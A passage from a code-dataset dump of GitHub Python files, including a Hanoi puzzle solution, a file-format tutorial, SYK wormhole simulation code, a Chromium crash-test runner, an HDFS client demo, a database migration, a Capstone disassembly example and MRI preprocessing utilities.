ins\n","repo_name":"qoh/dokus","sub_path":"dokus/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32191460024","text":"# https://programmers.co.kr/learn/courses/30/lessons/12946?language=python3\n\ndef solution(n):\n answer = []\n \n def hanoi(f,m,t,n,answer):\n if n == 0:\n return\n hanoi(f,t,m,n-1,answer)\n answer.append([f,t])\n hanoi(m,f,t,n-1,answer)\n \n hanoi(1,2,3,n,answer)\n \n return answer","repo_name":"JeongHoLim/practice","sub_path":"programmers/Lv3/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16892130579","text":"import csv\nimport openpyxl\nimport json\nimport requests\nimport xml.etree.ElementTree as Et\nimport PyPDF2\nfrom bs4 import BeautifulSoup\n\n# Working with a CSV file\nprint(csv.list_dialects())\ncsv_rows = []\n\nwith open(\"data.csv\") as csv_file:\n reader = csv.reader(csv_file, delimiter=\";\", quoting=csv.QUOTE_NONE)\n for row in reader:\n csv_rows.append(row)\n price = row[1]\n print(price)\n\nwith open(\"data.csv\", \"a\") as csv_file:\n writer = csv.writer(csv_file, delimiter=\";\")\n row = [\"iPad\", \"900\", \"2\"]\n writer.writerow(row)\n\n# Working with an Excel file\nwb = openpyxl.Workbook()\nws = wb.active\nfor row in csv_rows:\n ws.append(row)\n\nwb.save(\"file.xlsx\")\n\nwb.close()\n\nwb = openpyxl.load_workbook(\"file.xlsx\")\nws = wb.active\nprint(ws[\"A2\"].value)\nwb.close()\n\n# Working with a JSON file\nwith open(\"example.json\", \"r\") as file:\n json_file = json.load(file)\n q1 = json_file[\"quiz\"][\"sport\"][\"q1\"]\n question = q1[\"question\"]\n print(question)\n answer = q1[\"options\"][2]\n print(answer)\n\nwith open(\"result.json\", \"w\") as file:\n object_to_be_written = {\"header\": csv_rows[0]}\n json.dump(object_to_be_written, file)\n\n# Working with an XML file\nxml = Et.parse(\"file.xml\")\nit = xml.getroot().findall(\"country\")\nfor i in it:\n print(i.get(key=\"name\"))\n print(i.find(\"gdppc\").text)\n\n# Working with an HTML file\nresponse = requests.get(\"https://google.com\")\nsoup = BeautifulSoup(response.content, features=\"html.parser\")\nlink_list = soup.find_all(\"a\")\nprint(link_list)\n\n# Working with a PDF file\nwith open(\"file.pdf\", \"rb\") as pdf_file:\n reader = PyPDF2.PdfReader(pdf_file)\n for page in reader.pages:\n print(page.extract_text())\n\n\n\n\n","repo_name":"BogdanIancu/PythonForBeginners","sub_path":"Course16/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33202383551","text":"# file to implement the wormhole protocol using the analytic expression derived in Jafferis and Gao et al\nimport os\nimport numpy as np\nimport scipy\nfrom syk import * # my code implementing their majorana operators and Hamiltonians\n\n# projectors #\nPx_p = (np.eye(2)+Sx)/2\nPx_m = (np.eye(2)-Sx)/2\nPy_p = (np.eye(2)+Sy)/2\nPy_m = (np.eye(2)-Sy)/2\n\n## overview of protocol: ##\n# 1. at time -t', apply SWAP between right qubit in Bell state (Q) and left qubit in TFD state (L)\n# 2. at time 0, apply U = e^{i mu V} to the state\n# 3. at time t, apply SWAP between right qubit of TFD (R) and the final readout qubit T\n\ndef adjoint(state):\n ''' Returns the adjoint of a state vector. 
For a np.matrix, can use .H'''\n return np.conjugate(state).T\n\ndef is_valid_rho(rho, verbose=True):\n ''' Checks if a density matrix is valid. \n params:\n rho: density matrix to check\n verbose: bool, whether to print out what is wrong with rho\n '''\n tolerance = 1e-17\n # make sure not a 0 matrix\n if np.all(np.isclose(rho, np.zeros((rho.shape[0],rho.shape[1])), rtol=tolerance)):\n if verbose: print('rho is 0 matrix')\n return False\n # check if Hermitian\n if not(np.all(np.isclose(rho,adjoint(rho), rtol=tolerance))):\n if verbose: print(f'rho is not Hermitian')\n return False\n # check if positive semidefinite\n eig_val = np.linalg.eigvals(rho)\n if not(np.all(np.greater_equal(eig_val,np.zeros(len(eig_val))) | np.isclose(eig_val,np.zeros(len(eig_val)), rtol=tolerance))):\n if verbose: print('rho is not positive semidefinite. eigenvalues:', eig_val)\n return False\n # square root of rho must exist\n if np.isnan(rho).any() or np.isinf(rho).any():\n if verbose: \n print('rho has infs or nans')\n print('nan', np.isnan(rho))\n print('inf', np.isinf(rho))\n print(rho)\n return False\n # check if trace 1, within tolerance. can use param rtol to change tolerance\n if not(np.isclose(np.trace(rho), 1, tolerance)):\n if verbose: print('rho trace is not 1', np.trace(rho))\n return False\n return True\n\n# function to return the reduced density matrix for TR given a particular jex for Dirac fermion\ndef get_Uj(j,N,mu):\n # only sum over odd since otherwise projectors won't commute\n if j % 2 == 0:\n j_term = np.kron(Px_p, scipy.linalg.expm(1j*mu*Sz / 2)) + np.kron(Px_m, scipy.linalg.expm(-1j*mu*Sz / 2))\n \n # put inside tensor product\n j = j // 2\n if j > 1:\n for n in range(j-1):\n if n > 0:\n prod = np.kron(prod, np.eye(2))\n else:\n prod = np.eye(2)\n prod = np.kron(prod, np.eye(2))\n # tensor with Y tensor X\n prod = np.kron(prod, j_term)\n else:\n prod = j_term\n # tensor with I tensor I for N - m times\n if j > 0:\n for _ in range(N//2 - j):\n prod = np.kron(prod, np.eye(2))\n prod = np.kron(prod, np.eye(2))\n else:\n for _ in range(N//2 - j - 1):\n prod = np.kron(prod, np.eye(2))\n prod = np.kron(prod, np.eye(2))\n return prod\n else:\n j_term = np.kron(Py_p, scipy.linalg.expm(1j*mu*Sy / 2)) + np.kron(Py_m, scipy.linalg.expm(-1j*mu*Sy / 2))\n\n j = (j + 1) // 2\n # loop to tensor Z tensor X j-1 times\n if j > 1:\n for n in range(j-1):\n if n > 0:\n prod = np.kron(prod, np.eye(2))\n else:\n prod = Sz\n prod = np.kron(prod, np.eye(2))\n # tensor with X tensor X\n prod = np.kron(prod, j_term)\n else:\n prod = j_term\n # tensor with I tensor I for N/2 - j times\n for _ in range(N//2 - j):\n prod = np.kron(prod, np.eye(2))\n prod = np.kron(prod, np.eye(2))\n \n return prod\n \ndef get_U(N, mu=-12):\n '''Returns the unitary operator U = e^{i mu V}'''\n # get the Hamiltonian\n # get the potential operator\n for j in range(0, N, 2):\n if j == 0:\n U = get_Uj(j, N, mu)\n else:\n U += get_Uj(j, N, mu)\n return U\n\ndef get_TFD(H, beta=4):\n '''Returns the density matrix for the thermal state of the Hamiltonian H at inverse temperature beta'''\n print(H)\n \n # get the eigenvalues and eigenvectors of the Hamiltonian\n eig_val, eig_vec = np.linalg.eigh(H)\n print('len eig_val', len(eig_val))\n # print('first 10 eig val', eig_val[:10])\n N = int(np.log2(H.shape[0]))\n # get the partition function\n Z = np.sqrt(np.sum(np.exp(-beta * eig_val/2)**2))\n # get the density matrix\n TFD = np.exp(-beta * eig_val /2) / Z \n print(TFD)\n print(np.linalg.norm(TFD))\n TFD = TFD.reshape(2**N, 1)\n rho_TFD = TFD @ 
TFD.conj().T\n print('shape', rho_TFD.shape)\n print('is valid rho?', is_valid_rho(rho_TFD))\n return rho_TFD\n\ndef get_rho_TR(t, j_1 = 1, j_2 = 2, N=10, H=None, J2 = 4,beta=4, nt0 = -2.8):\n '''Define the non-trivial correlation functions and combine to get reduced density matrix.\n Params:\n t: time at which to evaluate the reduced density matrix\n j_1: index of the first majorana\n j_2: index of the second majorana\n N: number of qubits\n H: Hamiltonian\n l_r: left or right fermion\n J2: J^2 coupling strength\n beta: inverse temperature\n nt0: negative of initial time; assuming fixed injection time\n '''\n\n if H is None:\n H_ls = get_H(N, J2)\n H = np.array(H_ls[0] + H_ls[1])\n\n TFD = get_TFD(H=H, beta=beta)\n\n # get time evolution operator\n U_nt0 = time_ev(H,-nt0)\n U_t = time_ev(H,t)\n\n U = get_U(N)\n U_dagger = adjoint(U)\n\n # get right fermion\n psi_1_r = U_t @ majorana_right(j_1, N) # time-evolve the right fermion by t\n psi_1_r = psi_1_r.reshape(2**N, 2**N)\n psi_1_r_dagger = adjoint(psi_1_r)\n psi_2_r = U_t @ majorana_right(j_2, N) # time-evolve the right fermion by t\n psi_2_r = psi_2_r.reshape(2**N, 2**N)\n psi_2_r_dagger = adjoint(psi_2_r)\n\n # get left fermion\n psi_1_l = U_nt0 @ majorana_left(j_1, N), # time-evolve the left fermion by -t0\n psi_1_l = np.array(psi_1_l[0])\n psi_1_l = psi_1_l.reshape(2**N, 2**N)\n psi_1_l_dagger = adjoint(psi_1_l)\n psi_2_l = U_nt0 @ majorana_left(j_2, N), # time-evolve the left fermion by -t0\n psi_2_l = np.array(psi_2_l[0])\n psi_2_l = psi_2_l.reshape(2**N, 2**N)\n psi_2_l_dagger = adjoint(psi_2_l)\n\n # get rho_11\n rho_11 = .5 * (1 - np.trace(\n anti_commutator(psi_1_l, commutator(psi_2_l, psi_1_l @ U_dagger @ psi_1_r @ psi_2_r @ U)\n ) @ TFD\n ))\n # get rest of diagonals\n rho_22 = 1 - rho_11\n rho_33 = 1 - rho_11\n rho_44 = 1 - rho_22\n\n # get off diagonal\n rho_14 = .5 * np.trace(\n anti_commutator(psi_1_l, U_dagger @ psi_1_r @ U) @ TFD\n ) - np.trace(\n anti_commutator(psi_2_l, psi_1_l @ U_dagger @ psi_2_r @ U @ psi_1_l) @ TFD\n )\n\n # combine to get density matrix\n rho_TR = .5*np.array([[rho_11, 0, 0, rho_14], [0, rho_22, 0, 0], [0, 0, rho_33, 0], [rho_14.conj(), 0, 0, rho_44]])\n\n print('is rho_TR valid?', is_valid_rho(rho_TR))\n return rho_TR\n\ndef get_rho_TR_old(t, j, N, H=None, J2 = 4,beta=4, nt0 = -2.8):\n '''Define the non-trivial correlation functions and combine to get reduced density matrix.\n Params:\n t: time at which to evaluate the reduced density matrix\n j: index of the Dirac fermion\n N: number of qubits\n H: Hamiltonian\n l_r: left or right fermion\n J2: J^2 coupling strength\n beta: inverse temperature\n nt0: negative of initial time; assuming fixed injection time\n '''\n\n if H is None:\n H = get_H(N, J2)[0]\n H = np.array(H)\n print('H', H)\n\n TFD = get_TFD(H, beta)\n\n # get time evolution operator\n U_nt0 = time_ev(H,-nt0)\n U_t = time_ev(H,t)\n\n chi_l = U_nt0 @ get_dirac_left(j, N), # time-evolve the left fermion by -t0\n chi_l =chi_l[0]\n print('chi_l', chi_l)\n chi_l_dagger = chi_l.conj().T\n chi_r = U_t @ get_dirac_right(j, N) # time-evolve the right fermion by t\n chi_r = chi_r.reshape(2**N, 2**N)\n chi_r_dagger = chi_r.conj().T\n\n U = get_U(N)\n U_dagger = U.conj().T\n\n # chi_l @ chi_l_dagger @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l @ chi_l_dagger\n\n print('-------')\n\n print('first expec', np.trace(chi_l @ chi_l_dagger @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l @ chi_l_dagger @ TFD))\n\n print('-------')\n\n ## using the direct forms of chi; not sure if this is correct -- (not 
density matrices!)\n rho_11 = np.trace(chi_l @ chi_l_dagger @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l @ TFD)\n \n rho_14 = np.trace(chi_l @ U_dagger @ chi_r_dagger @ U @ chi_l @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ chi_l @ U_dagger @ chi_r_dagger @ U @ chi_l @ TFD)\n \n rho_22 = np.trace(chi_l @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ chi_l @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l_dagger @ chi_l @ TFD)\n\n rho_23 = np.trace(chi_l @ chi_l_dagger @ U_dagger @ chi_r_dagger @ U @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ U_dagger @ chi_r_dagger @ U @ chi_l_dagger @ chi_l @ TFD)\n\n rho_33 = np.trace(chi_l @ chi_l_dagger @ U_dagger @ chi_r_dagger @ chi_r @ U @ chi_l @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ U_dagger @ chi_r_dagger @ chi_r @ U @ chi_l @ TFD)\n\n rho_44 = np.trace(chi_l @ U_dagger @ chi_r_dagger @ chi_r @ U @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ chi_l @ U_dagger @ chi_r_dagger @ chi_r @ U @ chi_l_dagger @ chi_l @ TFD) \n\n # construct the density matrix\n rho_TR = .5 * np.array([[rho_11, 0, 0, rho_14], [0, rho_22, rho_23, 0], [0, rho_23.conj(), rho_33, 0], [rho_14.conj(), 0, 0, rho_44]])\n\n print('is rho_TR valid?', is_valid_rho(rho_TR))\n return rho_TR\n\ndef S(rho):\n print('rho', rho)\n '''Returns the von Neumann entropy of the density matrix rho'''\n\n # check valid density matrix\n if not(is_valid_rho(rho)):\n raise Exception('rho is not a valid density matrix')\n\n # diagonalize rho\n eig_val, eig_vec = np.linalg.eigh(rho)\n # get the entropy\n return -np.sum(eig_val * np.log2(eig_val, where=eig_val>0))\n\ndef get_IRT(t, j_1=1, j_2=2, N=10, H=None, J2 = 4,beta=4, nt0 = -2.8):\n '''Computes the mutual information of the RT state'''\n rho_TR = get_rho_TR(t=t, j_1=j_1, j_2 = j_2, N=N, H=H, J2 = J2, beta=beta, nt0 = nt0)\n print(rho_TR)\n rho_TR = rho_TR.reshape(2, 2, 2, 2)\n print('reshape', rho_TR)\n rho_T = np.trace(rho_TR, axis1=0, axis2=1)\n rho_R = np.trace(rho_TR, axis1=2, axis2=3)\n return S(rho_T) + S(rho_R) - S(rho_TR)\n\nif __name__ == '__main__':\n H_l = np.load('ham/H_10/H_10_right_20231114-020214.npy', allow_pickle=True)\n H_r = np.load('ham/H_10/H_10_right_20231114-020214.npy', allow_pickle=True)\n H = H_l + H_r\n\n # print(get_IRT(t=1, H=H))\n # get_TFD(H=H)\n print(get_rho_TR(2, H=H))\n \n # print_matrix(time_ev(H_l, 1), N = 10, is_SYK=False, other_name='U(t=1)')\n # print(time_ev(np.kron(Sx, Sx) + np.kron(Sy, Sy) + np.kron(Sz, Sz), 2))\n # print(time_ev(Sx, 1))\n \n\n # print(get_IRT(1, 1, 10, nt0=2, H=H_l))\n # print(np.linalg.eigvals(get_rho_TR(1, 1, 10, nt0=2, H=H)))\n # TFD = is_valid_rho(get_TFD(H))\n # print_matrix(get_TFD(H), N=10, is_SYK=False, other_name='TFD')\n\n\n","repo_name":"oscars47/Math-Thesis","sub_path":"interact_jg.py","file_name":"interact_jg.py","file_ext":"py","file_size_in_byte":11630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13077444445","text":"import argparse\nimport json\nimport os\nimport sys\n\n\nimport common\n\n# Add src/testing/ into sys.path for importing xvfb.\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nimport xvfb\n\n\n# Unfortunately we need to copy these variables from ../test_env.py.\n# Importing it and using its get_sandbox_env breaks test runs on Linux\n# (it seems to unset DISPLAY).\nCHROME_SANDBOX_ENV = 'CHROME_DEVEL_SANDBOX'\nCHROME_SANDBOX_PATH = 
'/opt/chromium/chrome_sandbox'\n\n\ndef main(argv):\n  parser = argparse.ArgumentParser()\n  parser.add_argument(\n      '--isolated-script-test-output', type=str,\n      required=True)\n  parser.add_argument(\n      '--isolated-script-test-chartjson-output', type=str,\n      required=False)\n  parser.add_argument(\n      '--isolated-script-test-perf-output', type=str,\n      required=False)\n  parser.add_argument(\n      '--isolated-script-test-filter', type=str,\n      required=False)\n\n  args = parser.parse_args(argv)\n\n  env = os.environ.copy()\n  # Assume we want to set up the sandbox environment variables all the\n  # time; doing so is harmless on non-Linux platforms and is needed\n  # all the time on Linux.\n  env[CHROME_SANDBOX_ENV] = CHROME_SANDBOX_PATH\n\n  if sys.platform == 'win32':\n    exe = os.path.join('.', 'content_shell.exe')\n  elif sys.platform == 'darwin':\n    exe = os.path.join('.', 'Content Shell.app', 'Contents', 'MacOS',\n                       'Content Shell')\n  else:\n    exe = os.path.join('.', 'content_shell')\n\n  with common.temporary_file() as tempfile_path:\n    env['CHROME_HEADLESS'] = '1'\n    rc = xvfb.run_executable([\n        sys.executable,\n        os.path.join(common.SRC_DIR, 'content', 'shell', 'tools',\n                     'breakpad_integration_test.py'),\n        '--verbose',\n        '--build-dir', '.',\n        '--binary', exe,\n        '--json', tempfile_path\n    ], env)\n\n    with open(tempfile_path) as f:\n      failures = json.load(f)\n\n  with open(args.isolated_script_test_output, 'w') as fp:\n    json.dump({\n        'valid': True,\n        'failures': failures,\n    }, fp)\n\n  return rc\n\n\ndef main_compile_targets(args):\n  json.dump(['content_shell_crash_test'], args.output)\n\n\nif __name__ == '__main__':\n  # Conform minimally to the protocol defined by ScriptTest.\n  if 'compile_targets' in sys.argv:\n    funcs = {\n      'run': None,\n      'compile_targets': main_compile_targets,\n    }\n    sys.exit(common.run_script(sys.argv[1:], funcs))\n  sys.exit(main(sys.argv[1:]))\n","repo_name":"kiwibrowser/src","sub_path":"testing/scripts/content_shell_crash_test.py","file_name":"content_shell_crash_test.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"}
{"seq_id":"25058529511","text":"# -*- coding: utf-8 -*-\n\n# @Time : 2020/3/7 18:43\n# @Author : focksor\n# @Email : focksor@outlook.com\nimport os\nfrom hdfs import Client, InsecureClient\n\nif __name__ == '__main__':\n    hdfs_ip = \"192.168.146.133\"\n    hdfs_version = 3\n    hdfs_root = \"~/test\"\n    filepath = r\"C:\\Users\\daqige\\PycharmProjects\\newLeetCode\\convert.py\"\n    # NameNode web UI: port 9870 on HDFS 3.x, 50070 on HDFS 2.x\n    hdfs_addr = \"http://\" + hdfs_ip + \":\" + str(9870 if\n                                                 (hdfs_version == 3) else 50070)\n\n    client = Client(hdfs_addr)\n\n    # print(\"create directory\")\n    # client.makedirs(hdfs_root)\n    # print(client.list(\"/\"))\n    #\n    # print(\"upload file\")\n    # client.upload(hdfs_root, filepath)\n    # print(client.list(hdfs_root))\n    #\n    # print(\"rename file\")\n    # client.rename(hdfs_root + \"/convert.py\", hdfs_root + \"/ubuntu.py\")\n    # print(client.list(hdfs_root))\n\n    print(\"download file\")\n    client.download(hdfs_root + \"/ubuntu.py\", \".\")\n    print(os.listdir(\".\"))\n\n    print(\"delete file\")\n    client.delete(hdfs_root + \"/ubuntu.py\")\n    print(client.list(hdfs_root))\n","repo_name":"Gleiphir2769/newLeetCode","sub_path":"hadoop.py","file_name":"hadoop.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"17861542104","text":"from capstone import *\nfrom capstone.arm import *\nfrom capstone.arm64 import *\n\n\ndef x86():\n    CODE = 
b\"\\x55\\x48\\x8b\\x05\\xb8\\x13\\x00\\x00\"\n\n md = Cs(CS_ARCH_X86, CS_MODE_64)\n for (address, size, mnemonic, op_str) in md.disasm_lite(CODE, 0x1000):\n print(\"0x%x:\\t%s\\t%s\" % (address, mnemonic, op_str))\n\n\ndef mips():\n CODE = b\"\\x56\\x34\\x21\\x34\\xc2\\x17\\x01\\x00\"\n\n md = Cs(CS_ARCH_MIPS, CS_MODE_MIPS64 + CS_MODE_LITTLE_ENDIAN)\n for i in md.disasm(CODE, 0x1000):\n print(\"%x:\\t%s\\t%s\" % (i.address, i.mnemonic, i.op_str))\n\n\ndef arm():\n CODE = b\"\\xf1\\x02\\x03\\x0e\\x00\\x00\\xa0\\xe3\\x02\\x30\\xc1\\xe7\\x00\\x00\\x53\\xe3\"\n\n md = Cs(CS_ARCH_ARM, CS_MODE_ARM)\n md.detail = True\n\n for i in md.disasm(CODE, 0x1000):\n if i.id in (ARM_INS_BL, ARM_INS_CMP):\n print(\"0x%x:\\t%s\\t%s\" % (i.address, i.mnemonic, i.op_str))\n\n if len(i.regs_read) > 0:\n print(\"\\tImplicit registers read: \"),\n for r in i.regs_read:\n print(\"%s \" % i.reg_name(r)),\n # print()\n\n if len(i.groups) > 0:\n print(\"\\tThis instruction belongs to groups:\"),\n for g in i.groups:\n print(\"%u\" % g),\n # print()\n\n\ndef arm64():\n CODE = b\"\\xe1\\x0b\\x40\\xb9\\x20\\x04\\x81\\xda\\x20\\x08\\x02\\x8b\"\n\n md = Cs(CS_ARCH_ARM64, CS_MODE_ARM)\n md.detail = True\n\n for insn in md.disasm(CODE, 0x38):\n print(\"0x%x:\\t%s\\t%s\" % (insn.address, insn.mnemonic, insn.op_str))\n\n if len(insn.operands) > 0:\n print(\"\\tNumber of operands: %u\" % len(insn.operands))\n c = -1\n for i in insn.operands:\n c += 1\n if i.type == ARM64_OP_REG:\n print(\"\\t\\toperands[%u].type: REG = %s\" % (c, insn.reg_name(i.value.reg)))\n if i.type == ARM64_OP_IMM:\n print(\"\\t\\toperands[%u].type: IMM = 0x%x\" % (c, i.value.imm))\n if i.type == ARM64_OP_CIMM:\n print(\"\\t\\toperands[%u].type: C-IMM = %u\" % (c, i.value.imm))\n if i.type == ARM64_OP_FP:\n print(\"\\t\\toperands[%u].type: FP = %f\" % (c, i.value.fp))\n if i.type == ARM64_OP_MEM:\n print(\"\\t\\toperands[%u].type: MEM\" % c)\n if i.value.mem.base != 0:\n print(\"\\t\\t\\toperands[%u].mem.base: REG = %s\" % (c, insn.reg_name(i.value.mem.base)))\n if i.value.mem.index != 0:\n print(\"\\t\\t\\toperands[%u].mem.index: REG = %s\" % (c, insn.reg_name(i.value.mem.index)))\n if i.value.mem.disp != 0:\n print(\"\\t\\t\\toperands[%u].mem.disp: 0x%x\" % (c, i.value.mem.disp))\n\n if i.shift.type != ARM64_SFT_INVALID and i.shift.value:\n print(\"\\t\\t\\tShift: type = %u, value = %u\" % (i.shift.type, i.shift.value))\n\n if i.ext != ARM64_EXT_INVALID:\n print(\"\\t\\t\\tExt: %u\" % i.ext)\n\n if insn.writeback:\n print(\"\\tWrite-back: True\")\n if not insn.cc in [ARM64_CC_AL, ARM64_CC_INVALID]:\n print(\"\\tCode condition: %u\" % insn.cc)\n if insn.update_flags:\n print(\"\\tUpdate-flags: True\")\n\n\nif __name__ == '__main__':\n x86()\n","repo_name":"saber0x0/BCfuzzer","sub_path":"binop/disasm.py","file_name":"disasm.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36740594254","text":"\"\"\"Make articles image nullable; add missing index\n\nRevision ID: c96a3e4d47aa\nRevises: 425cee5e4912\nCreate Date: 2021-01-06 14:51:21.543302\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"c96a3e4d47aa\"\ndown_revision = \"425cee5e4912\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.alter_column(\"articles\", \"image\", existing_type=sa.VARCHAR(), nullable=True)\n    op.create_index(op.f(\"ix_articles_id2\"), \"articles\", [\"id\"], unique=False)\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_index(op.f(\"ix_articles_id2\"), table_name=\"articles\")\n    op.alter_column(\"articles\", \"image\", existing_type=sa.VARCHAR(), nullable=False)\n    # ### end Alembic commands ###\n","repo_name":"sentinel-hub/digital-twin-of-news","sub_path":"dton-api/app/database/versions/c96a3e4d47aa_make_articles_image_nullable.py","file_name":"c96a3e4d47aa_make_articles_image_nullable.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"73828439206","text":"# -*- coding: utf-8 -*-\n# +\n# Overview:\n# Some preprocessing steps are rather time-consuming, so this code performs them offline. The preprocessing includes:\n\n# Removing redundant timepoints (in fact, after manual curation of the dataset there are no nii.gz files with multiple timepoints left)\n# Removing the black frame in advance, since the raw nii.gz files contain a lot of black border.\n# Reorienting to LPS\n# Applying dilation to the lesions\n\n# +\nimport random\nimport numpy as np\nimport cupy as cp\nimport h5py\nfrom glob import glob\nfrom tqdm import tqdm\nimport SimpleITK as sitk\n# SimpleITK must be imported before torch; do not reverse the order, or the kernel crashes.\nimport torch\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transforms\n\nimport os\n# os.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"TRUE\"\n# -\nclass WRZ_MaskRCNN_Dataset_Processor(Dataset):\n    \"\"\"\n    Dataset preprocessing class for Mask R-CNN in the WRZ project.\n    Reads MRI images and mask annotations in nii.gz format, processes them, and saves them in the specified format.\n    One mode:\n    the user specifies the list of sample file paths of the dataset.\n    \"\"\"\n    def __init__(\n        self,\n        lower_bound=5,\n        outspacing=None,#(0.5,0.5,1.5)\n    ):\n        \"\"\"\n        \"\"\"\n        self.lower_bound = lower_bound\n        self.outspacing = outspacing\n        \n\n    def __call__(self, filepath_img, filepath_mask):\n        # read the images\n        img_sitk = sitk.ReadImage(filepath_img)\n        mask_sitk = sitk.ReadImage(filepath_mask)\n        \n        # delete nuisance channel\n        if img_sitk.GetDimension()==4:\n            img_sitk = img_sitk[:,:,:,0]# for MRI with multiple timepoints, lesions are only annotated on the first timepoint\n        \n        # orient\n        img_sitk = sitk.DICOMOrient(img_sitk,desiredCoordinateOrientation='LPS')\n        mask_sitk = sitk.DICOMOrient(mask_sitk,desiredCoordinateOrientation='LPS')\n        \n        # crop outer frame\n        img_sitk, bbox = SITKCropOuterFrame( self.lower_bound )(img_sitk)\n        mask_sitk = mask_sitk[bbox[0]:bbox[1],bbox[2]:bbox[3],bbox[4]:bbox[5]]\n        \n        # dilation\n        mask_sitk = sitk.DilateObjectMorphology(mask_sitk, kernelRadius=(5, 5, 0), kernelType=sitk.sitkBall)\n        \n        # resample\n        if self.outspacing:\n            img_sitk = resampleimg_sitk(outspacing=self.outspacing, img_sitk=img_sitk, method=sitk.sitkLinear)\n            mask_sitk = resampleimg_sitk(outspacing=self.outspacing, img_sitk=mask_sitk, method=sitk.sitkNearestNeighbor)\n        \n        return img_sitk, mask_sitk\n\n\n\ndef resampleimg_sitk(outspacing, img_sitk, method=sitk.sitkLinear):\n    \"\"\"\n    Resample the volume to the specified spacing\\n\n    params:\n        outspacing: the target spacing, e.g. [1,1,1]\n        img_sitk: the image read by sitk, here a volume\\n\n    return: the resampled data\n    \"\"\"\n    outsize = [0, 0, 0]\n    # read the size and spacing info of the file\n    inputsize = img_sitk.GetSize()\n    inputspacing = img_sitk.GetSpacing()\n    \n    transform = sitk.Transform()\n    transform.SetIdentity()\n    # compute the size after changing the spacing: physical extent / voxel size\n    outsize[0] = round(inputsize[0] * inputspacing[0] / outspacing[0])\n    outsize[1] = round(inputsize[1] * inputspacing[1] / outspacing[1])\n    outsize[2] = round(inputsize[2] * inputspacing[2] / outspacing[2])\n    \n    # set up the resampler parameters\n    resampler = sitk.ResampleImageFilter()\n    resampler.SetTransform(transform)\n    resampler.SetInterpolator(method)\n    resampler.SetOutputOrigin(img_sitk.GetOrigin())\n    
resampler.SetOutputSpacing(outspacing)\n    resampler.SetOutputDirection(img_sitk.GetDirection())\n    resampler.SetSize(outsize)\n    newimg_sitk = resampler.Execute(img_sitk)\n    return newimg_sitk\n\n\nclass SITKResample(object):\n    \"\"\"\n    Resample a SimpleITK image to the specified spacing\n    \"\"\"\n    def __init__(self,target_spacing):\n        super().__init__()\n        self.target_spacing = target_spacing\n    \n    def __call__(self,img_sitk):\n        target_spacing = list(self.target_spacing)\n        if (self.target_spacing[2] == -1):\n            target_spacing[2] = max(1.0,img_sitk.GetSpacing()[2]) \n        return resampleimg_sitk(target_spacing, img_sitk)\n\n\nclass SITKRandomResample(object):\n    \"\"\"\n    Resample a SimpleITK image to a randomly sampled spacing\n    \"\"\"\n    def __init__(self,target_spacing_lower,target_spacing_upper):\n        super().__init__()\n        self.target_spacing_lower = target_spacing_lower\n        self.target_spacing_upper = target_spacing_upper\n    \n    def __call__(self,img_sitk):\n        if (self.target_spacing_lower[2] == -1) and (self.target_spacing_upper[2] == -1):\n            target_spacing = ( \n                np.round( np.random.uniform(self.target_spacing_lower[0],self.target_spacing_upper[0]), 2),\n                np.round( np.random.uniform(self.target_spacing_lower[1],self.target_spacing_upper[1]), 2),\n                max(1.0,img_sitk.GetSpacing()[2]),\n            )\n        else:\n            target_spacing = ( \n                np.round( np.random.uniform(self.target_spacing_lower[0],self.target_spacing_upper[0]), 2),\n                np.round( np.random.uniform(self.target_spacing_lower[1],self.target_spacing_upper[1]), 2),\n                np.round( np.random.uniform(self.target_spacing_lower[2],self.target_spacing_upper[2]), 2),\n            )\n        return resampleimg_sitk(target_spacing, img_sitk)\n\n\n# +\nclass SITKDICOMOrient(object):\n    \"\"\"\n    SimpleITK.DICOMOrient\n    \"\"\"\n    def __init__(self,desiredCoordinateOrientation='LPS'):\n        super().__init__()\n        self.desiredCoordinateOrientation = desiredCoordinateOrientation\n    \n    def __call__(self,img_sitk):\n        return sitk.DICOMOrient(img_sitk,self.desiredCoordinateOrientation)\n    \n    \nclass SITKNormalize(object):\n    \"\"\"\n    SimpleITK.Normalize\n    \"\"\"\n    def __init__(self):\n        super().__init__()\n    \n    def __call__(self,img_sitk):\n        return sitk.Normalize(img_sitk)\n\n\n# -\n\nclass SITKCropOuterFrame(object):\n    \"\"\"\n    Crop away the outer black frame\n    reference: 